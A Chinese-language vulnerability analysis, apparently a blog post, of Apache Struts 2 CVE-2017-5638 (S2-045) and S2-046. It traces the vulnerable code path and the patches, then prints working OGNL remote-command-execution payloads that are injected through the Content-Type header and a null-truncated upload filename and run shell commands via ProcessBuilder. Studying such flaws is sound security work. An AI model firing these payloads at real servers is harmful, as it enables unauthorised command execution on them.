0x00 漏洞概述

編號為CVE-2017-5638。

官方描述是：

It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.

在請求頭的Content-Type處注入OGNL表示式，會被Struts 2報錯執行。遠端攻擊者可藉助帶有＃cmd=[字串]的特製Content-Type HTTP頭利用該漏洞執行任意命令。

影響版本：Struts 2.3.5-Struts 2.3.31、Struts 2.5-Struts 2.5.10。

0x01 漏洞原始碼

基於原始碼版本Struts 2.3.20。

git clone https://github.com/apache/Struts.git

cd Struts

git checkout STRUTS_2_3_20

部分網傳為Jakarta plugin外掛導致的問題，其實不然（Struts 2確實有外掛導致的漏洞）。Struts 2預設使用org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest類對上傳資料進行解析，並非外掛。僅有最後一步完成上傳操作（common upload）是呼叫了第三方元件。

入口過濾器

首先進入StrutsPrepareAndExecuteFilter類（Struts 2預設配置的入口過濾器）。在這裡對輸入物件request進行封裝：

request = prepare.wrapRequest(request);

跟進這條語句，PrepareOperations.java中可見：

request = dispatcher.wrapRequest(request);

再次跟進，在Dispatcher.java中得到封裝為StrutsRequestWrapper的過程：

public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException {
        // don't wrap more than once
        if (request instanceof StrutsRequestWrapper) {
            return request;
        }

        String content_type = request.getContentType();
        if (content_type != null && content_type.contains("multipart/form-data")) {
            MultiPartRequest mpr = getMultiPartRequest();
            LocaleProvider provider = getContainer().getInstance(LocaleProvider.class);
            request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider);
        } else {
            request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup);
        }

        return request;
    }
 

在這裡有兩個地方值得關注。

• 第835行，需要使content_type.contains("multipart/form-data")判斷為true。網傳PoC中就有這麼一部分：

  #nike='multipart/form-data'
  

  這實際就是把關鍵字串挪給了別的鍵，給Content-Type騰出位置。用nike是因為發現者為安恆資訊研究員Nike.Zheng。

• 第836行，getMultiPartRequest()方法，這個方法可以繼續追蹤下去。通過配置struts.multipart.parser可以指定不同的解析類，預設則是使用上面提到的org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest。

struts.multipart.parser：該屬性指定處理multipart/form-data的MIME型別（檔案上傳）請求的框架，該屬性支援cos、pell和jakarta等屬性值，即分別對應使用cos的檔案上傳框架、pell上傳及common-fileupload檔案上傳框架。該屬性的預設值為jakarta。

補丁對比

根據官方給出的影響版本範圍，檢視修復補丁——Struts 2.3.32版本和Struts 2.5.10.1版本。

Struts 2.3.32版本修改了：

Struts 2.5.10.1版本修改了：

都是針對LocalizedTextUtil.findText()方法的。

LocalizedTextUtil.findText方法

跟進這個findText()方法，可以看到使用了熟悉的引數valueStack。ValueStack.java中定義了這個引數型別。

即通過鍵值關係從ActionContext中返回OGNL的堆疊結構。所以這個valueStack與OGNL的最終被執行有關。

接下來跟進findText()中與valueStack相關的語句，可以發現對valueStack的操作有：

• findMessage()
• getMessage()
• getDefaultMessage()
• ReflectionProviderFactory.getInstance().getRealTarget()

findMessage()執行中都會呼叫到getMessage()，而getMessage()和getDefaultMessage()中都存在buildMessageFormat()用於資訊格式化。格式化的訊息由TextParseUtil.translateVariables()生成。

getMessage()方法有個引數bundleName，由aClass賦值，而aClass是整個觸發流程中的一個File異常類，並不在Collections.java中。執行過程中，getMessage()和findMessage()都只能返回null，所以會被觸發的只有getDefaultMessage()。

TextParseUtil.translateVariables方法

跟進一下TextParseUtil.translateVariables()的實現。

即先對defaultMessage進行OGNL表示式的提取，然後執行。漏洞觸發的關鍵就是構造含有惡意OGNL表示式的defaultMessage。

0x02 利用流程

s2-045

先行測試

隨便傳個檔案後抓包改包。

使用的PoC為（必須含有multipart/form-data）：

Content-Type:%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data

運算被執行！

傳馬

"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls -l /tmp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

s2-046

與s2-045類似，但注入位置是上傳檔案的filename。

先行測試

PoC：

%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\x00b

在最後的b對應位元組前，使用00截斷：

傳馬

"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls /tmp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} b"

再次使用00截斷即可。

0x03 補充

所使用的vulhub映象把s2-045去掉了，只能自行找war包搭建，不過說不定其它版本的vulhub還保留著。

s2-046的方法更為暴力，也更容易被WAF過濾。基本上有s2-045則必有s2-046。